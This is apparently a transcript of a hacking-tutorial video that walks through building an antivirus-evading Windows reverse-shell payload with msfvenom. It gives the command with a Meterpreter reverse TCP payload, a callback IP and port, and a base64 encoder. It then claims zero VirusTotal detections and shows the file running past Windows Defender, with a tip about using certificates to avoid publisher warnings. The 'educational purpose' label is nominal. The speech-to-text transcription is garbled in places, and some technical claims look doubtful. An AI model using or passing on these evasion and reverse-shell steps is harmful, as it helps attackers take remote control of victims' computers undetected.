Hello everyone, welcome to Paper Hacking series. In this video, I'm going to show how to create an undetectable payload. This video is only for educational purpose. It will help you during your pen testing and the ethical hacking process. If you're watching this video without subscribing, I would request you to subscribe the channel. It will really motivate me to create more interesting content for you guys. Without delay, let's get into the video. I'm going to show how to create an undetectable payload using Msfvenom. We can bypass the payload from antivirus detection and execute the payload successfully without any issue. To do that, let's go to the terminal and type command sudo msfvenom -l encoders. You can see there are a lot of encoders options are available. Some encoders options are rated as good, normal, excellent, manual. So there are a lot of things you can see it. For example, you can see your Ruby base 64 encoder is there, and you can see there are a lot of encoders are there. Rubies and Pythons, those things aren't all there, right? So these are low hanging fruits, so that when you are creating this encoders, this will be there. So even you can create a PowerShell base 64 encoder. If you have anything PowerShell script, you can import it. And there are a lot of options are there. So you can play around it, you can do it. For my testing, for this video, I'm going to create a reverse shell payload. For that, I'm going to use PHP base 64, which is a base 64 encoder. So let's go and quickly create the payload. Let me copy it. Sudo msfvenom -p Windows Metapletter reverse TCP lhost. In this case, I need to give the calibration IP address, which is 10.10.1.33, and L port is 1234. You can use anything as your wish. Then encoder, I need to paste the one PHP-base 64, and the output, I want to save this file in the desktop. So /home/pber/desktop, and I'm giving the file name is text4.exe and enter. So now the payload is creating. Let's wait for some more time. So let's upload this payload in the virus total and check it on it, whether we have created an undetectable payload or not. So I'm just confirming the upload. It seems like it is none of the search engines are detecting. So far it is going well. Cool. So out of 61 searching, none of this detected. So we have created a very good undetectable payload. So none of the search engine has detected this as a malicious payload. Now it is time to test in a Windows 10. You can see that I have enabled Defender and all the options are active. Even I have downloaded the payload, but still Defenders are not detected and quarantine. So you can see this. So I have downloaded this. So all the options are active. So let me run the payload. You're seeing this pop-up because of unknown publisher. You can use any free CA certificate and you can come over this pop-up. So this is basically, this pop-up is coming because of unknown publisher. So when you are creating a mad load, if you are created properly, you can overcome this one. So let me run this one. See, the payload executed and the Defender didn't detect it. We have created undetectable payload and bypass the Defender. Thank you all for watching this video. I hope the video content was useful and interesting. If you think, please consider subscribing the channel and support in the channel growth. Please reach out to me via Discord and Telegram if you have any questions. Links are in the description. Please follow me for the channel updates in Twitter and LinkedIn. See you soon all with another interesting video. Until signing off from you all, bye, take care.